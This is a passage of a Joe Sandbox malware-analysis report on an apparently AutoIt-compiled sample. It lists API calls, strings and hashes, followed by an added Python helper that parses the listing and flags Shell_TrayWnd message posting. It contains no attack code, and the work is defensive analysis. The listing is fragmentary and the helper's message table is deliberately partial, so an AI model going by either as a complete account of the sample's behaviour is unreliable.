                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                        • String ID: static
                                                                        • API String ID: 1983116058-2160076837
                                                                        APIs
                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 00959699
                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009596A8
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: LengthMessageSendTextWindow
                                                                        • String ID: edit
                                                                        • API String ID: 2978978980-2167791130
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 009352D5
                                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 009352F4
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: InfoItemMenu_memset
                                                                        • String ID: 0
                                                                        • API String ID: 2223754486-4108050209
                                                                        APIs
                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00944DF5
                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00944E1E
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: Internet$OpenOption
                                                                        • String ID: <local>
                                                                        • API String ID: 942729171-4266983199
                                                                        APIs
                                                                        • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0094A84E
                                                                        • htons.WSOCK32(00000000,?,00000000), ref: 0094A88B
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: htonsinet_addr
                                                                        • String ID: 255.255.255.255
                                                                        • API String ID: 3832099526-2422070025
                                                                        APIs
                                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0092B7EF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 3850602802-1403004172
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 0092B6EB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 3850602802-1403004172
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 0092B76C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 3850602802-1403004172
                                                                        APIs
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: ClassName_wcscmp
                                                                        • String ID: #32770
                                                                        • API String ID: 2292705959-463685578
                                                                        APIs
                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0092A63F
                                                                          • Part of subcall function 009113F1: _doexit.LIBCMT ref: 009113FB
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: Message_doexit
                                                                        • String ID: AutoIt$Error allocating memory.
                                                                        • API String ID: 1993061046-4017498283
                                                                        APIs
                                                                        • GetSystemDirectoryW.KERNEL32(?), ref: 0096ACC0
                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0096AEBD
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: DirectoryFreeLibrarySystem
                                                                        • String ID: WIN_XPe
                                                                        • API String ID: 510247158-3257408948
                                                                        APIs
                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009586A2
                                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 009586B5
                                                                          • Part of subcall function 00937A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00937AD0
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: FindMessagePostSleepWindow
                                                                        • String ID: Shell_TrayWnd
                                                                        • API String ID: 529655941-2988720461
                                                                        • Opcode ID: a15a4bcb94d765745fa7f01d111fb94907fa0d21f8e1bdf5bf8f806a09e144de
                                                                        • Instruction ID: 2b7d55fd5178c1a0034e104ad0cf600fc0f36d0f4e37b37a3bd3a5bfde46fcd7
                                                                        • Opcode Fuzzy Hash: a15a4bcb94d765745fa7f01d111fb94907fa0d21f8e1bdf5bf8f806a09e144de
                                                                        • Instruction Fuzzy Hash: DAD01272799318B7E27467709C0BFC67A289F85B25F100815B74DEA1D0C9E0E980DB54
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009586E2
• PostMessageW.USER32(00000000), ref: 009586E9
  • Part of subcall function 00937A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00937AD0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 259a409f91d2939940ede1b5c78f0e5ce0e96b2c8f8c4a8d6a0839d422c16412
• Instruction ID: 2f89aaba3340b977271191b6b13c87333ec344788d85ab56fc8fddba48c24c7e
• Opcode Fuzzy Hash: 259a409f91d2939940ede1b5c78f0e5ce0e96b2c8f8c4a8d6a0839d422c16412
• Instruction Fuzzy Hash: 66D0127279A3187BF27467709C0BFC67A289F85B25F100815B74DEA1D0C9E0E980DB54
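The two function entries above share one API ID (FindMessagePostSleepWindow): each resolves the taskbar window by class name (Shell_TrayWnd) and posts a message to it. In the first entry the arguments are resolved: message 0x0111 is WM_COMMAND and wParam 0x197 (407) is the taskbar's toggle-desktop command; in the second only the window handle was recovered. Pairing FindWindowW("Shell_TrayWnd") with PostMessageW(WM_COMMAND, ...) is consistent with the compiled-AutoIt finding in the signature list, since the AutoIt runtime implements its window-management built-ins this way. The script below is an added triage helper, not part of the Joe Sandbox report or the sample: it parses API lines in the report's text layout into structured records, decodes the message argument of PostMessage/SendMessage calls, and flags functions that look up Shell_TrayWnd and then post to it. The SAMPLE text is a constructed copy of the two entries above, and the small WINDOW_MESSAGES table is an assumption covering only a few common messages.

```python
"""Parse Joe Sandbox 'APIs' entries and flag Shell_TrayWnd message-posting sequences.

Added example (not part of the report). Input layout follows the report text
above; SAMPLE is a constructed copy of the two function entries.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: the two function entries from the report, as extracted text.
SAMPLE = """\
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009586A2
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 009586B5
  • Part of subcall function 00937A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00937AD0
Strings
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009586E2
• PostMessageW.USER32(00000000), ref: 009586E9
  • Part of subcall function 00937A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00937AD0
Strings
"""

# One API line: optional "Part of subcall function X:" prefix, API.MODULE(args), ref: ADDR
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Assumed lookup table: only the few window messages worth naming in triage.
WINDOW_MESSAGES = {0x0010: "WM_CLOSE", 0x0111: "WM_COMMAND", 0x0112: "WM_SYSCOMMAND"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                       # address of the call site
    subcall_of: Optional[int] = None  # set when the line is "Part of subcall function"


@dataclass
class FunctionEntry:
    calls: List[ApiCall] = field(default_factory=list)


def parse_entries(text: str) -> List[FunctionEntry]:
    """Split report text into per-function entries, one per 'APIs' header."""
    entries: List[FunctionEntry] = []
    current: Optional[FunctionEntry] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionEntry()
            entries.append(current)
            continue
        m = API_RE.match(line)
        if m and current is not None:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            current.calls.append(ApiCall(
                api=m["api"], module=m["mod"], args=args, ref=int(m["ref"], 16),
                subcall_of=int(m["sub"], 16) if m["sub"] else None))
    return entries


def to_int(arg: str) -> Optional[int]:
    """Report arguments are zero-padded hex; '?' and string names are unresolved."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def decode_postmessage(call: ApiCall):
    """Return (msg_name, wParam, lParam) for a Post/SendMessage call, or None if unresolved."""
    if not call.api.startswith(("PostMessage", "SendMessage")) or len(call.args) < 4:
        return None
    msg, wparam, lparam = (to_int(a) for a in call.args[1:4])
    if msg is None:
        return None
    return WINDOW_MESSAGES.get(msg, f"0x{msg:04X}"), wparam, lparam


def find_taskbar_commands(entries: List[FunctionEntry]):
    """Flag entries whose top-level calls resolve Shell_TrayWnd and then post/send to it.

    Subcall lines are ignored: they belong to a callee, not to this function's own sequence.
    """
    hits = []
    for idx, entry in enumerate(entries):
        top = [c for c in entry.calls if c.subcall_of is None]
        for i, c in enumerate(top):
            if c.api.startswith("FindWindow") and c.args and c.args[0] == "Shell_TrayWnd":
                for later in top[i + 1:]:
                    if later.api.startswith(("PostMessage", "SendMessage")):
                        hits.append({"entry": idx, "find_ref": c.ref, "post_ref": later.ref,
                                     "decoded": decode_postmessage(later)})
                        break
    return hits


if __name__ == "__main__":
    for hit in find_taskbar_commands(parse_entries(SAMPLE)):
        print(hit)
```

Run against a full report export, the `decoded` field separates the benign-looking toggle-desktop/minimize-all commands an AutoIt script issues from any other message targeted at the shell window, and the `ref` addresses tie each hit back to the disassembly entry it came from.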